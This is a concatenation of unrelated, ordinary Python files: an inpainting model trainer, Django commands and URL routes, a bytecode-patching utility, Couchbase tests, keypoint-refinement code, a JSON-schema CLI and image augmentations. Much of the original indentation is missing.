line_pred = self.inpaint_model.structure_upsample(line_pred)[0]
line_pred = torch.sigmoid((line_pred + random_add_v) * random_mul_v)
line_pred = F.interpolate(line_pred, size=(image_size, image_size), mode='bilinear',
align_corners=False)
items['edge'][:b, ...] = edge_pred.detach()
items['line'][:b, ...] = line_pred.detach()
# train
outputs, gen_loss, dis_loss, logs, batch = self.inpaint_model.process(items)
if iteration >= max_iteration:
keep_training = False
break
logs = [("epoch", epoch), ("iter", iteration)] + \
[(i, logs[0][i]) for i in logs[0]] + [(i, logs[1][i]) for i in logs[1]]
logs.append(("g_lr", self.inpaint_model.g_scheduler.get_lr()[0]))
logs.append(("d_lr", self.inpaint_model.d_scheduler.get_lr()[0]))
logs.append(("str_lr", self.inpaint_model.str_scheduler.get_lr()[0]))
logs.append(("img_size", batch['size_ratio'][0].item() * 256))
progbar.add(len(items['image']),
values=logs if self.config.VERBOSE else [x for x in logs if not x[0].startswith('l_')])
# log model at checkpoints
if self.config.LOG_INTERVAL and iteration % self.config.LOG_INTERVAL == 0 and self.global_rank == 0:
self.log(logs)
# sample model at checkpoints
if self.config.SAMPLE_INTERVAL and iteration > 0 and iteration % self.config.SAMPLE_INTERVAL == 0 and self.global_rank == 0:
self.sample()
# evaluate model at checkpoints
if self.config.EVAL_INTERVAL and iteration > 0 and iteration % self.config.EVAL_INTERVAL == 0 and self.global_rank == 0:
print('\nstart eval...\n')
print("Epoch: %d" % epoch)
psnr, ssim, fid = self.eval()
if self.best > fid:
self.best = fid
print("current best epoch is %d" % epoch)
print('\nsaving %s...\n' % self.inpaint_model.name)
raw_model = self.inpaint_model.generator.module if \
hasattr(self.inpaint_model.generator, "module") else self.inpaint_model.generator
raw_encoder = self.inpaint_model.str_encoder.module if \
hasattr(self.inpaint_model.str_encoder, "module") else self.inpaint_model.str_encoder
torch.save({
'iteration': self.inpaint_model.iteration,
'generator': raw_model.state_dict(),
'str_encoder': raw_encoder.state_dict(),
'best_fid': fid,
'ssim': ssim,
'psnr': psnr
}, os.path.join(self.config.PATH,
self.inpaint_model.name + '_best_gen_HR.pth'))
raw_model = self.inpaint_model.discriminator.module if \
hasattr(self.inpaint_model.discriminator, "module") else self.inpaint_model.discriminator
torch.save({
'discriminator': raw_model.state_dict()
}, os.path.join(self.config.PATH, self.inpaint_model.name + '_best_dis_HR.pth'))
# save model at checkpoints
if self.config.SAVE_INTERVAL and iteration > 0 and iteration % self.config.SAVE_INTERVAL == 0 and self.global_rank == 0:
self.save()
if self.global_rank == 0:
print("Epoch: %d, time for one epoch: %d seconds" % (epoch, time.time() - epoch_start))
logs = [('Epoch', epoch), ('time', time.time() - epoch_start)]
self.log(logs)
print('\nEnd training....')
def eval(self):
val_loader = DataLoader(self.val_dataset, shuffle=False, pin_memory=True,
batch_size=self.config.BATCH_SIZE, num_workers=12)
self.inpaint_model.eval()
with torch.no_grad():
for items in tqdm(val_loader):
                for k in items:
                    if isinstance(items[k], torch.Tensor):
                        items[k] = items[k].to(self.device)
b, _, _, _ = items['edge'].shape
edge_pred, line_pred = SampleEdgeLineLogits(self.inpaint_model.transformer,
context=[items['img_256'][:b, ...],
items['edge_256'][:b, ...],
items['line_256'][:b, ...]],
mask=items['mask_256'][:b, ...].clone(),
iterations=5,
add_v=0.05, mul_v=4,
device=self.device)
edge_pred, line_pred = edge_pred[:b, ...].detach().to(torch.float32), \
line_pred[:b, ...].detach().to(torch.float32)
if self.config.fix_256 is None or self.config.fix_256 is False:
edge_pred = self.inpaint_model.structure_upsample(edge_pred)[0]
edge_pred = torch.sigmoid((edge_pred + 2) * 2)
line_pred = self.inpaint_model.structure_upsample(line_pred)[0]
line_pred = torch.sigmoid((line_pred + 2) * 2)
items['edge'][:b, ...] = edge_pred.detach()
items['line'][:b, ...] = line_pred.detach()
# eval
items = self.inpaint_model(items)
outputs_merged = (items['predicted_image'] * items['mask']) + (items['image'] * (1 - items['mask']))
# save
outputs_merged *= 255.0
outputs_merged = outputs_merged.permute(0, 2, 3, 1).int().cpu().numpy()
for img_num in range(b):
cv2.imwrite(self.val_path + '/' + items['name'][img_num], outputs_merged[img_num, :, :, ::-1])
our_metric = get_inpainting_metrics(self.val_path, self.config.GT_Val_FOLDER, None, fid_test=True)
if self.global_rank == 0:
print("iter: %d, PSNR: %f, SSIM: %f, FID: %f, LPIPS: %f" %
(self.inpaint_model.iteration, float(our_metric['psnr']), float(our_metric['ssim']),
float(our_metric['fid']), float(our_metric['lpips'])))
logs = [('iter', self.inpaint_model.iteration), ('PSNR', float(our_metric['psnr'])),
('SSIM', float(our_metric['ssim'])), ('FID', float(our_metric['fid'])),
('LPIPS', float(our_metric['lpips']))]
self.log(logs)
return float(our_metric['psnr']), float(our_metric['ssim']), float(our_metric['fid'])
def sample(self, it=None):
# do not sample when validation set is empty
if len(self.val_dataset) == 0:
return
self.inpaint_model.eval()
with torch.no_grad():
items = next(self.sample_iterator)
            for k in items:
                if isinstance(items[k], torch.Tensor):
                    items[k] = items[k].to(self.device)
b, _, _, _ = items['edge'].shape
edge_pred, line_pred = SampleEdgeLineLogits(self.inpaint_model.transformer,
context=[items['img_256'][:b, ...],
items['edge_256'][:b, ...],
items['line_256'][:b, ...]],
mask=items['mask_256'][:b, ...].clone(),
iterations=5,
add_v=0.05, mul_v=4,
device=self.device)
edge_pred, line_pred = edge_pred[:b, ...].detach().to(torch.float32), \
line_pred[:b, ...].detach().to(torch.float32)
if self.config.fix_256 is None or self.config.fix_256 is False:
edge_pred = self.inpaint_model.structure_upsample(edge_pred)[0]
edge_pred = torch.sigmoid((edge_pred + 2) * 2)
line_pred = self.inpaint_model.structure_upsample(line_pred)[0]
line_pred = torch.sigmoid((line_pred + 2) * 2)
items['edge'][:b, ...] = edge_pred.detach()
items['line'][:b, ...] = line_pred.detach()
# inpaint model
iteration = self.inpaint_model.iteration
inputs = (items['image'] * (1 - items['mask']))
items = self.inpaint_model(items)
outputs_merged = (items['predicted_image'] * items['mask']) + (items['image'] * (1 - items['mask']))
if it is not None:
iteration = it
image_per_row = 2
if self.config.SAMPLE_SIZE <= 6:
image_per_row = 1
images = stitch_images(
self.postprocess((items['image']).cpu()),
self.postprocess((inputs).cpu()),
self.postprocess(items['edge'].cpu()),
self.postprocess(items['line'].cpu()),
self.postprocess(items['mask'].cpu()),
self.postprocess((items['predicted_image']).cpu()),
self.postprocess((outputs_merged).cpu()),
img_per_row=image_per_row
)
path = os.path.join(self.samples_path, self.model_name)
name = os.path.join(path, str(iteration).zfill(6) + ".jpg")
create_dir(path)
print('\nsaving sample ' + name)
images.save(name)
def log(self, logs):
with open(self.log_file, 'a') as f:
f.write('%s\n' % ' '.join([str(item[0]) + '\t' + str(item[1]) for item in logs]))
def cuda(self, *args):
return (item.to(self.config.DEVICE) for item in args)
def postprocess(self, img):
# [0, 1] => [0, 255]
img = img * 255.0
img = img.permute(0, 2, 3, 1)
return img.int()
|
65185
|
from optparse import make_option
from django.core.management.base import AppCommand
from django.core.management.sql import sql_custom
from django.db import connections, DEFAULT_DB_ALIAS
class Command(AppCommand):
help = "Prints the custom table modifying SQL statements for the given app name(s)."
option_list = AppCommand.option_list + (
make_option('--database', action='store', dest='database',
default=DEFAULT_DB_ALIAS, help='Nominates a database to print the '
'SQL for. Defaults to the "default" database.'),
)
output_transaction = True
def handle_app(self, app, **options):
return u'\n'.join(sql_custom(app, self.style, connections[options.get('database')])).encode('utf-8')
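# Invocation sketch (app and database names below are placeholders; the
# command name follows Django's convention of deriving it from this module's
# filename):
#   ./manage.py sqlcustom myapp
#   ./manage.py sqlcustom myapp --database=replica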
|
65187
|
from itertools import zip_longest
from typing import List, Union
from bytepatches.ops import Opcode, sync_ops, LOAD_FAST, STORE_FAST, JumpOp, LOAD_NAME, STORE_NAME
from bytepatches.parser import Parser
from bytepatches.utils import patch_function, make_bytecode
class OpNotFound(Exception):
pass
def change_ops(ops: List[Opcode], ops_before: List[Opcode], ops_after: List[Opcode]):
index = 0
found = False
_cache = {}
indices = []
while True:
if index == len(ops):
if not found:
raise OpNotFound("Ops not found!")
break
target = ops[index:index + len(ops_before)]
if target == ops_before:
for existing, op in zip(target, ops_before):
if op is not None and isinstance(op._arg, str):
if op._arg not in _cache:
_cache[op._arg] = [existing]
else:
_cache[op._arg].append(existing)
found = True
indices.append(index)
index += 1
for index in indices:
for before, after in zip_longest(ops_before, ops_after):
if after is not None:
if isinstance(after._arg, str):
target = _cache[after._arg].pop(0)
cls = type(after)
after = cls(target._arg, target.arg, target.val)
if before is None:
# Append after
ops.insert(index, after)
elif after is None:
# Remove before
                # We can't pop here (it would shift later indices), so set the slot to None and strip the Nones afterwards
# Go forwards first
new_target = None
direction = 1
pos = index
target = ops[index]
ops[index] = None
while new_target is None:
pos += direction
try:
new_target = ops[pos]
except IndexError:
direction = -1
for op in ops:
if isinstance(op, JumpOp) and op.val == target:
if op.reljump():
op._arg = new_target.bytecode_pos - op.bytecode_pos
else:
op._arg = new_target.bytecode_pos
op.val = new_target
else:
# Switch ops
for op in ops:
if isinstance(op, JumpOp) and op.val == before:
op.val = after
after.set_bytecode_pos(ops[index].bytecode_pos)
ops[index] = after
index += 1
for index, item in reversed(list(enumerate(ops))):
if item is None:
ops.pop(index)
sync_ops(ops)
def replace(func, before_code: Union[str, List[Opcode]], after_code: Union[str, List[Opcode]], name_to_fast=False):
fn_code = func.__code__
consts = list(fn_code.co_consts)
names = list(fn_code.co_names)
varnames = list(fn_code.co_varnames)
groups = []
if isinstance(before_code, str):
before = compile(before_code, "<input>", "exec")
groups.append(before)
if isinstance(after_code, str):
after = compile(after_code, "<input>", "exec")
groups.append(after)
for group in groups:
for const in group.co_consts:
if const not in consts:
consts.append(const)
for name in group.co_names:
if name not in names:
names.append(name)
for varname in group.co_varnames:
if varname not in varnames:
varnames.append(varname)
if name_to_fast:
for name in names:
if name not in varnames:
varnames.append(name)
if isinstance(before_code, str):
before_ops = Parser(before_code).parse_bytecode(False)
else:
before_ops = before_code
if isinstance(after_code, str):
after_ops = Parser(after_code).parse_bytecode(False)
else:
after_ops = after_code
# TODO: Find a more reliable way to strip LOAD_CONST(None) RETURN_VALUE from code if not in the input
if before_ops[-1].op_name == "RETURN_VALUE" and before_ops[-1].arg is not None and before_ops[-1].arg.arg is None:
before_ops = before_ops[:-2]
after_ops = after_ops[:-2]
if before_ops[-1].op_name == "POP_TOP" and before_ops[-1].arg is None:
before_ops = before_ops[:-1]
after_ops = after_ops[:-1]
if isinstance(before_code, str):
for i, op in enumerate(before_ops):
if name_to_fast:
if op.op_name == "LOAD_NAME":
op = LOAD_FAST(op._arg, op.arg, op.val)
elif op.op_name == "STORE_NAME":
op = STORE_FAST(op._arg, op.arg, op.val)
if "CONST" in op.op_name:
val = before.co_consts[op._arg]
if op._arg != consts.index(val):
op._arg = consts.index(val)
elif "NAME" in op.op_name:
val = before.co_names[op._arg]
if op._arg != names.index(val):
op._arg = names.index(val)
elif "FAST" in op.op_name:
group = before.co_varnames
if name_to_fast:
group += before.co_names
val = group[op._arg]
if op._arg != varnames.index(val):
op._arg = varnames.index(val)
before_ops[i] = op
if isinstance(after_code, str):
for i, op in enumerate(after_ops):
if name_to_fast:
if op.op_name == "LOAD_NAME":
op = LOAD_FAST(op._arg, op.arg, op.val)
elif op.op_name == "STORE_NAME":
op = STORE_FAST(op._arg, op.arg, op.val)
if "CONST" in op.op_name:
val = after.co_consts[op._arg]
if op._arg != consts.index(val):
op._arg = consts.index(val)
elif "NAME" in op.op_name:
val = after.co_names[op._arg]
if op._arg != names.index(val):
op._arg = names.index(val)
elif "FAST" in op.op_name:
group = after.co_varnames
if name_to_fast:
group += after.co_names
val = group[op._arg]
if op._arg != varnames.index(val):
op._arg = varnames.index(val)
after_ops[i] = op
ops = Parser(func).parse_bytecode(False)
change_ops(ops, before_ops, after_ops)
names, varnames = optimize_access(ops)
payload = make_bytecode(ops)
patch_function(func, payload, consts=tuple(consts), names=tuple(names), varnames=tuple(varnames))
return func
def optimize_access(ops: List[Opcode]):
accessed_names = []
accessed_varnames = []
for op in ops:
if isinstance(op, (LOAD_NAME, STORE_NAME)) and op.arg not in accessed_names:
accessed_names.append(op.arg)
elif isinstance(op, (LOAD_FAST, STORE_FAST)) and op.arg not in accessed_varnames:
accessed_varnames.append(op.arg)
accessed_names = tuple(accessed_names)
accessed_varnames = tuple(accessed_varnames)
for op in ops:
if isinstance(op, (LOAD_NAME, STORE_NAME)):
op._arg = accessed_names.index(op.arg)
elif isinstance(op, (LOAD_FAST, STORE_FAST)):
op._arg = accessed_varnames.index(op.arg)
return accessed_names, accessed_varnames
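# A minimal usage sketch (not part of the original module). The exact
# behaviour depends on the bytepatches Parser/patch_function internals, so
# this only illustrates the intended call shape: compile `before`/`after`
# from source strings and patch `func` in place.
#
# def answer():
#     x = 1
#     return x
#
# replace(answer, "x = 1", "x = 2", name_to_fast=True)
# assert answer() == 2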
|
65257
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import shutil
import sys
import tempfile
from observations.r.pension import pension
def test_pension():
"""Test module pension.py by downloading
pension.csv and testing shape of
extracted data has 194 rows and 19 columns
"""
test_path = tempfile.mkdtemp()
x_train, metadata = pension(test_path)
try:
assert x_train.shape == (194, 19)
  except Exception:
    shutil.rmtree(test_path)
    raise
|
65287
|
from django.conf.urls import include, url
from rest_framework import routers
from api import views
from django.urls import path
route = routers.DefaultRouter()
route.register(r'user', views.UserViewSet)
route.register(r'store', views.StoreViewSet)
route.register(r'itemCategory', views.ItemCategoryViewSet)
route.register(r'itemSubCategory', views.ItemSubCategoryViewSet)
route.register(r'item', views.ItemViewSet)
route.register(r'shoppingCart', views.ShppingCartViewSet)
route.register(r'trade', views.TradeViewSet)
route.register(r'group', views.GroupViewSet)
route.register(r'storeFollow', views.StoreFollowViewSet)
route.register(r'itemFollow', views.ItemFollowViewSet)
route.register(r'groupFollow', views.GroupFollowViewSet)
route.register(r'banner', views.BannerViewSet)
route.register(r'systemMessage', views.SystemMessageViewSet)
route.register(r'chatMessage', views.ChatMessageViewSet)
route.register(r'coupon', views.CouponViewSet)
route.register(r'dailyOffItem', views.DailyOffItemViewSet)
route.register(r'itemDetailImage', views.ItemDetailImageViewSet)
route.register(r'itemBannerImage', views.ItemBannerImageViewSet)
route.register(r'evaluateImage', views.EvaluateImageViewSet)
route.register(r'address', views.AddressViewSet)
route.register(r'brand', views.BrandViewSet)
route.register(r'collection', views.CollectionViewSet)
route.register(r'browseRecord', views.BrowseRecordViewSet)
route.register(r'searchRecord', views.SearchRecordViewSet)
route.register(r'evaluate', views.EvaluateViewSet)
urlpatterns = [
url('api/', include(route.urls)),
path('api/get_user_cart_item/<int:pk>', views.get_user_cart_item),
path('api/get_user_store_follow/<int:pk>', views.get_user_store_follow),
path('api/get_user_item_follow/<int:pk>', views.get_user_item_follow),
path('api/item_detail_image/<int:pk>', views.item_detail_image),
path('api/item_banner_image/<int:pk>', views.item_banner_image),
path('api/get_user_coupon/<int:pk>', views.get_user_coupon),
path('api/delete_user_collection/', views.delete_user_collection),
path('api/get_user_collection/<int:pk>', views.get_user_collection),
path('api/browse_item/', views.browse_item),
path('api/get_store_evaluate/<int:pk>', views.get_store_evaluate),
path('api/search_content/<int:pk>/', views.search_content),
path('api/whether_user_collect_item/', views.whether_user_collect_item),
path('api/evaluate_image/<int:pk>', views.evaluate_image),
path('api/get_item_evaluate_amount/<int:pk>', views.get_item_evaluate_amount),
path('api/get_item_evaluate_info/<int:pk>', views.get_item_evaluate_info),
path('api/whether_user_buy_item_in_store/', views.whether_user_buy_item_in_store),
path('api/get_item_collection_amount/<int:pk>', views.get_item_collection_amount),
path('api/get_recommend_item/<int:pk>', views.get_recommend_item),
path('api/get_evaluate_type/', views.get_evaluate_type),
path('api/get_wait_receive/', views.get_wait_receive),
path('api/get_wait_evaluate/', views.get_wait_evaluate),
path('api/get_complete_trade/', views.get_complete_trade),
path('api/buy_now/', views.buy_now),
path('api/add_into_cart/', views.add_into_cart),
path('api/buy_in_cart/', views.buy_in_cart),
path('api/confirm_receive/<int:pk>', views.confirm_receive),
path('api/get_history_item/<int:pk>', views.get_history_item),
path('api/get_user_store_info/<int:pk>', views.get_user_store_info),
path('api/update_user_address/', views.update_user_address),
path('api/upload_user_head_image/<int:pk>', views.upload_user_head_image),
path('api/upload_item_preview_image/<int:pk>', views.upload_item_preview_image),
]
|
65303
|
import sys
log_file_path = sys.argv[1]
with open(log_file_path) as f:
lines = f.readlines()
for line in lines:
# Ignore errors from CPU instruction set, symbol existing testing,
# or compilation error formatting
ignored_keywords = [
'src.c',
'CheckSymbolExists.c',
'test_compilation_error_formatting',
]
    if all(keyword not in line for keyword in ignored_keywords):
        # lines already carry their trailing newline, so suppress print()'s
        print(line, end='')
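# Usage sketch (the script and log file names below are placeholders):
#   python filter_build_log.py /path/to/build.log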
|
65314
|
import asyncio
from couchbase.asynchronous import AsyncSearchResult
from couchbase.asynchronous import AsyncAnalyticsResult
from .fixtures import asynct, AioTestCase
from couchbase.exceptions import CouchbaseException, SearchException, NotSupportedException
from unittest import SkipTest
import couchbase.search as SEARCH
class CouchbaseBeerTest(AioTestCase):
def setUp(self, **kwargs):
try:
return super(CouchbaseBeerTest, self).setUp(
bucket='beer-sample', **kwargs)
except CouchbaseException:
raise SkipTest("Need 'beer-sample' bucket for this")
class CouchbaseBeerKVTest(CouchbaseBeerTest):
def setUp(self):
super(CouchbaseBeerKVTest, self).setUp()
@asynct
@asyncio.coroutine
def test_get_data(self):
connargs = self.make_connargs(bucket='beer-sample')
beer_default_collection = self.gen_collection(**connargs)
yield from (beer_default_collection.on_connect() or asyncio.sleep(0.01))
data = yield from beer_default_collection.get('21st_amendment_brewery_cafe')
self.assertEqual("21st Amendment Brewery Cafe", data.content["name"])
class CouchbaseBeerViewTest(CouchbaseBeerTest):
def setUp(self):
super(CouchbaseBeerViewTest, self).setUp(type='Bucket')
@asynct
@asyncio.coroutine
def test_query(self):
beer_bucket = self.gen_cluster(
**self.make_connargs()).bucket('beer-sample')
yield from (beer_bucket.on_connect() or asyncio.sleep(0.01))
viewiter = beer_bucket.view_query("beer", "brewery_beers", limit=10)
yield from viewiter.future
count = len(list(viewiter))
self.assertEqual(count, 10)
class CouchbaseDefaultTestKV(AioTestCase):
@asynct
@asyncio.coroutine
def test_upsert(self):
import uuid
expected = str(uuid.uuid4())
default_collection = self.gen_collection(**self.make_connargs())
yield from (default_collection.on_connect() or asyncio.sleep(0.01))
yield from default_collection.upsert('hello', {"key": expected})
obtained = yield from default_collection.get('hello')
self.assertEqual({"key": expected}, obtained.content)
class AIOClusterTest(AioTestCase):
def setUp(self, **kwargs):
super(AIOClusterTest, self).setUp(**kwargs)
@asynct
@asyncio.coroutine
def test_n1ql(self):
cluster = self.gen_cluster(**self.make_connargs())
yield from (cluster.on_connect() or asyncio.sleep(0.01))
it = cluster.query(self.query_props.statement)
yield from it.future
data = list(it)
self.assertEqual(self.query_props.rowcount, len(data))
@asynct
@asyncio.coroutine
def test_search(self # type: Base
):
cluster = self.gen_cluster(**self.make_connargs())
yield from (cluster.on_connect() or asyncio.sleep(0.01))
try:
it = cluster.search_query("beer-search", SEARCH.TermQuery("category"),
facets={'fred': SEARCH.TermFacet('category', 10)})
yield from it.future
data = list(it)
self.assertIsInstance(it, AsyncSearchResult)
self.assertEqual(10, len(data))
except SearchException as e:
if isinstance(e.inner_cause,
NotSupportedException) and self.is_mock:
raise SkipTest("Not supported")
class AnalyticsTest(AioTestCase):
    # Without @asynct/@asyncio.coroutine the `yield from` body would only
    # build a generator and the assertions would never run (cf. the tests above).
    @asynct
    @asyncio.coroutine
    def testBatchedAnalytics(self  # type: Base
):
cluster = self.gen_cluster(**self.make_connargs())
yield from (cluster.on_connect() or asyncio.sleep(0.01))
it = cluster.analytics_query(
"SELECT * FROM `{}` LIMIT 1".format(self.dataset_name))
yield from it.future
self.assertIsInstance(it, AsyncAnalyticsResult)
self.assertEqual(1, len(it.rows()))
|
65331
|
from typing import Dict, Optional

import torch
from torchtyping import TensorType
from tqdm import tqdm
from typeguard import typechecked
"""
# PCA rationale:
# check for the constraints , if small, do nothing
# if needed, project the result onto the constraints using the projection parameters
# pca_reproject(x_after_step, self.proj_params) to go back to plausible values (if epsilon = 0)
# if epsilon non-zero. project onto all evecs (discarded and kept). these are all orthogonal.
# you go one by one. if your in the kept eigenvecs, do nothing. if you're in discarded evecs, you're outside constraint space
# you have a sclar proj per dim. so in those held out dims, you manually set the projs to be epsilon instead of that high projection that you may encounter.
# you modify all the projections onto the discarded evecs. you have a vector which is num_obs x num_evecs. this is the representation of data in the PCA coordinate basis
# then, you modify that representation, and you send it back to the original space using the transpose of the evecs.
# Temporal rationale: want x_t - x_t-1 to be small. compute the difference per timepoint. choose one direction, say forward. you have two points in
# you have 2 points in 2d space. the difference vector is the direction. compute the norm. if norm > epsilon, rescale it so norm is equal to epsilon. diff/epsilon -- now you have a direction and a step size. you define x_t += x_t-1 + diff/epsilon.
# the next time point has to be inside a ball with radius epsilon. if it's outside, you project onto the exterior of that ball. if it's inside, keep it where it is.
# the result will be different if you start from the end or from the beggining.
"""
def MSE(preds: TensorType["num_samples", "num_keypoints", 2],
        gt: TensorType["num_samples", "num_keypoints", 2]):
    # Note: despite the name, this returns the mean Euclidean (L2) keypoint
    # error per sample, not a squared error.
    bp_error = torch.linalg.norm(preds - gt, dim=2)  # error per keypoint-frame
    average_error = torch.nanmean(bp_error, dim=1)  # mean over keypoints
    return average_error
@typechecked
class ProjectedGD(object):
""" projected gradient descent on an L2 ball subject to constraints"""
def __init__(
self,
data: TensorType["num_obs", "obs_dim"] = None,
ground_truth: Optional[TensorType["num_obs", "obs_dim"]] = None,
confidences: Optional[TensorType["num_obs", "num_keypoints"]] = None,
proj_params: dict = None,
lr: Optional[float] = None,
max_iter: int = 1000,
tol: float = 1e-5,
verbose: bool = False,
lr_decay_factor: float = 0.25,
):
"""assume you get only the bodyparts of interest for this, irrelevant cols get filtered externally"""
self.max_iter = max_iter
self.tol = tol
self.verbose = verbose
self.data: TensorType["num_samples", "num_keypoints", 2] = data.reshape(data.shape[0], -1, 2)
self.ground_truth: TensorType["num_samples", "num_keypoints", 2] = ground_truth.reshape(ground_truth.shape[0], -1, 2)
self.proj_params = proj_params
self.optimized_preds = self.data.detach().clone() # + torch.randn_like(data)*1e-4 # torch.nn.parameter.Parameter(data=data.detach().clone())
self.x_list = []
self.lr_list = []
self.error_list = []
self.confidences = 1.0
self.lr_decay_factor = lr_decay_factor
if confidences is not None:
            self.confidences: TensorType["num_obs", "num_keypoints", 1] = confidences.unsqueeze(2)
            self.confidences = torch.clamp(self.confidences, min=0.0, max=1.0)
if lr is not None:
self.lr = lr
else:
self.lr = self.initialize_alpha()
    # TODO: modify norm to be over the last dimension. have num_keypoints norms per sample.
# TODO: everything else can remain in this shape?
# When conf comes in, reshape it similarly.
# currently this is not used.
@staticmethod
def l2_grad(
diffs: TensorType["num_samples", "num_keypoints", 2], scalar: float = 1.0
) -> TensorType["num_samples", "num_keypoints", 2]:
# TODO: test
if torch.allclose(diffs, torch.zeros_like(diffs)):
# don't divide by zero
return diffs
else:
norm: TensorType["num_samples", "num_keypoints",1] = torch.linalg.norm(diffs, dim=2, keepdim=True)
grad = diffs * scalar * (1.0 / norm)
return grad
def grad_step(
self, x_curr: TensorType["num_samples", "num_keypoints", 2]
) -> TensorType["num_samples", "num_keypoints", 2]:
norm: TensorType["num_samples", "num_keypoints", 1] = torch.linalg.norm(x_curr-self.data, dim=2, keepdim=True)
step: TensorType["num_samples", "num_keypoints", 1] = (self.lr * self.confidences) / (norm + 1e-8)
step = torch.clamp(step, min=0.0, max=1.0)
x_after_step = (1-step)*x_curr + step*self.data
return x_after_step
# standard way below
# return x_curr - self.lr * self.l2_grad(x_curr - self.data)
def project(
self, x_after_step: TensorType["num_samples", "num_keypoints", 2]
) -> TensorType["num_samples", "num_keypoints", 2]:
# reshape
x_after_step = x_after_step.reshape(x_after_step.shape[0],-1)
# reproject
reprojected = self.proj_params["pca_singleview"].reproject(x_after_step)
# reshape back
reprojected = reprojected.reshape(x_after_step.shape[0], -1, 2)
return reprojected
def step(
self, x_curr: TensorType["num_samples", "num_keypoints", 2]
) -> TensorType["num_samples", "num_keypoints", 2]:
x_after_step = self.grad_step(x_curr=x_curr) # gradient descent on the l2 norm objective
x_after_projection = self.project(x_after_step=x_after_step) # project the current x onto the constraints, get plausible x
return x_after_projection
def initialize_alpha(self) -> TensorType[(), float]:
# project
projected = self.project(x_after_step=self.data)
# compute the difference
diff = projected - self.data # X_0 - Y
# compute the norm and divide by confidences
alpha = torch.max(torch.norm(diff, dim=2, keepdim=True) / self.confidences)
return alpha
def fit(self) -> TensorType["num_samples", "num_keypoints", 2]:
        # TODO: measure RMSE per iteration, run for longer, understand what it's doing
x_curr = self.optimized_preds.clone()
# project and initialize step size.
for i in tqdm(range(self.max_iter)):
# projected gradient descent step
x_new = self.step(x_curr)
if self.verbose:
print(f"iteration {i}")
print(f"x_curr: {x_curr}")
print(f"x_new: {x_new}")
if torch.allclose(x_curr, x_new, atol=self.tol):
                # no change means step was clamped at 1.0 (too big): decrease lr and move away from the data
self.lr = self.lr * self.lr_decay_factor
x_curr = x_new.clone()
self.error_list.append(MSE(x_curr, self.ground_truth))
self.x_list.append(x_new) # record the new x
self.lr_list.append(self.lr) # record the new step size
self.optimized_preds = x_new
return self.optimized_preds
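# A hypothetical usage sketch (`pca` must expose a `.reproject(x)` method, as
# `project` above assumes):
# solver = ProjectedGD(data=preds, ground_truth=gt,
#                      proj_params={"pca_singleview": pca}, max_iter=500)
# refined_preds = solver.fit()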
|
65356
|
from typing import Type
from fpipe.exceptions import FileDataException
from fpipe.file import File
from fpipe.meta.abstract import FileData, T
def meta_prioritized(t: Type[FileData[T]], *sources: File) -> T:
error = FileDataException(t)
for s in sources:
try:
return s[t]
except FileDataException:
pass
raise error
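# A hypothetical usage sketch (`Size` stands in for any FileData[T] subclass):
# size = meta_prioritized(Size, cached_file, remote_file)
# This reads Size from cached_file if available, falls back to remote_file,
# and raises FileDataException(Size) if neither source has it.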
|
65451
|
import json
import lzma
from glob import glob
from pprint import pprint
from typing import Optional
import pandas as pd
import smart_open
import typer
from tqdm import tqdm
ORDERED_VAR = ["table", "name", "description", "type"]
TEXTTT_VAR = ["table", "name"]
app = typer.Typer()
@app.command()
def sniff(path: str, tar: bool = True, examples: bool = False, break_after: Optional[int] = None):
"""Print the schema of a JSON file to stdout
Notes:
--tar: for .xz files
--examples/--no-examples: report example for each var
--break-after: number of iterations after which sniffing stops
"""
key_val = {}
i = 0
for file in tqdm(glob(path)):
if tar:
_open = lzma.open
else:
_open = smart_open.open
with _open(file) as f:
for l in tqdm(f):
i += 1
for k, v in json.loads(l).items():
                    if k in key_val:
if examples:
key_val.update(
{k: (key_val[k][0] + 1, key_val[k][1], key_val[k][2])}
)
else:
key_val.update({k: (key_val[k][0] + 1, key_val[k][1])})
else:
if examples:
key_val.update({k: (1, type(v), v)})
else:
key_val.update({k: (1, type(v))})
if break_after:
if i > break_after:
break
pprint(key_val)
@app.command()
def json2md(file: str):
"""Transform a Json schema to Markdown - Copy to clip-board"""
to_texttt = lambda x: "`" + x + "`"
df = pd.read_json(file)
    table = "fields" in df.columns
if table:
df["table"] = "bibl"
for name, field in df[["name", "fields"]].query("fields==fields").values:
tmp = pd.DataFrame.from_dict(field)
tmp["table"] = name
df = df.append(tmp, sort=False)
df = df[df["fields"].isna()]
# df = df.drop(["mode", "fields"], axis=1)
if not table:
ORDERED_VAR.remove("table")
TEXTTT_VAR.remove("table")
df = df[ORDERED_VAR]
for var in TEXTTT_VAR:
df[var] = df[var].apply(to_texttt)
typer.echo(f"{df.set_index(ORDERED_VAR[0])}")
# typer.secho(message="Table (.md) copied to clip-board", fg=typer.colors.BLUE)
if __name__ == "__main__":
app()
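# Example invocations (a sketch; module name and paths are placeholders):
#   python schema_tool.py sniff "dumps/*.json.xz" --tar --examples --break-after 1000
#   python schema_tool.py json2md schema.json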
|
65455
|
SECRET_KEY = "abc"
FILEUPLOAD_ALLOWED_EXTENSIONS = ["png"]
# FILEUPLOAD_PREFIX = "/cool/upload"
# FILEUPLOAD_LOCALSTORAGE_IMG_FOLDER = "images/boring/"
FILEUPLOAD_RANDOM_FILE_APPENDIX = True
FILEUPLOAD_CONVERT_TO_SNAKE_CASE = True
|
65457
|
import random
import numpy as np
import cv2
from utils.transforms.transforms import CustomTransform
class RandomFlip(CustomTransform):
def __init__(self, prob_x=0, prob_y=0):
"""
Arguments:
----------
prob_x: range [0, 1], probability to use horizontal flip, setting to 0 means disabling flip
prob_y: range [0, 1], probability to use vertical flip
"""
self.prob_x = prob_x
self.prob_y = prob_y
def __call__(self, sample):
img = sample.get('img').copy()
segLabel = sample.get('segLabel', None)
if segLabel is not None:
segLabel = segLabel.copy()
flip_x = np.random.choice([False, True], p=(1 - self.prob_x, self.prob_x))
flip_y = np.random.choice([False, True], p=(1 - self.prob_y, self.prob_y))
if flip_x:
img = np.ascontiguousarray(np.flip(img, axis=1))
if segLabel is not None:
segLabel = np.ascontiguousarray(np.flip(segLabel, axis=1))
if flip_y:
img = np.ascontiguousarray(np.flip(img, axis=0))
if segLabel is not None:
segLabel = np.ascontiguousarray(np.flip(segLabel, axis=0))
_sample = sample.copy()
_sample['img'] = img
_sample['segLabel'] = segLabel
return _sample
class Darkness(CustomTransform):
def __init__(self, coeff):
        assert coeff >= 1., "Darkness coefficient must be at least 1"
self.coeff = coeff
def __call__(self, sample):
img = sample.get('img')
coeff = np.random.uniform(1., self.coeff)
img = (img.astype('float32') / coeff).astype('uint8')
_sample = sample.copy()
_sample['img'] = img
return _sample
